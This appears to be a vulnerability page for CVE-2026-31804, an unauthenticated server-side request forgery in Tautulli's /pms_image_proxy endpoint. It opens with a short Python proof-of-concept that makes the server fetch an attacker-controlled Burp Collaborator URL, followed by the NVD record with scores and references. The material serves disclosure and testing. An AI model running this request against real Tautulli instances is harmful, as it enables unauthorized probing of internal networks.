CVE-2026-31804

# PoC code for CVE-2026-31804 import requests target_url = "http://localhost:8181" # Replace with Tautulli URL # Attacker controlled URL to verify outbound request (e.g., Burp Collaborator) attacker_url = "http://burpcollaborator.net" # Exploit endpoint exploit_endpoint = f"{target_url}/pms_image_proxy" # Payload params = { "img": attacker_url } try: # Send request without authentication response = requests.get(exploit_endpoint, params=params, timeout=10) print(f"Request sent to {exploit_endpoint}") print(f"Check {attacker_url} for DNS/HTTP interactions") except Exception as e: print(f"Error: {e}")

{"cve": {"id": "CVE-2026-31804", "sourceIdentifier": "[email protected]", "published": "2026-03-30T20:16:21.517", "lastModified": "2026-04-14T01:43:40.347", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tautulli is a Python based monitoring and tracking tool for Plex Media Server. Prior to version 2.17.0, the /pms_image_proxy endpoint accepts a user-supplied img parameter and forwards it to Plex Media Server's /photo/:/ transcode transcoder without authentication and without restricting the scheme or host. The endpoint is intentionally excluded from all authentication checks in webstart.py, any value of img beginning with http is passed directly to Plex, this causes the Plex Media Server process, which typically runs on the same host or internal network as Tautulli, with access to RFC-1918 address space, to issue an outbound HTTP request to any attacker-specified URL. This issue has been patched in version 2.17.0."}, {"lang": "es", "value": "Tautulli es una herramienta de monitoreo y seguimiento basada en Python para Plex Media Server. Antes de la versión 2.17.0, el endpoint /pms_image_proxy acepta un parámetro 'img' proporcionado por el usuario y lo reenvía al transcodificador /photo/:/ transcode de Plex Media Server sin autenticación y sin restringir el esquema o el host. El endpoint está intencionalmente excluido de todas las comprobaciones de autenticación en webstart.py, cualquier valor de 'img' que comience con HTTP se pasa directamente a Plex, esto hace que el proceso de Plex Media Server, que normalmente se ejecuta en el mismo host o red interna que Tautulli, con acceso al espacio de direcciones RFC-1918, emita una solicitud HTTP saliente a cualquier URL especificada por el atacante. Este problema ha sido parcheado en la versión 2.17.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tautulli:tautulli:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17.0", "matchCriteriaId": "A0B5F451-819C-4ADA-BFFA-EDA898A7D082"}]}]}], "references": [{"url": "https://github.com/Tautulli/Tautulli/releases/tag/v2.17.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/Tautulli/Tautulli/security/advisories/GHSA-qj2f-4c4p-wv97", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}]}}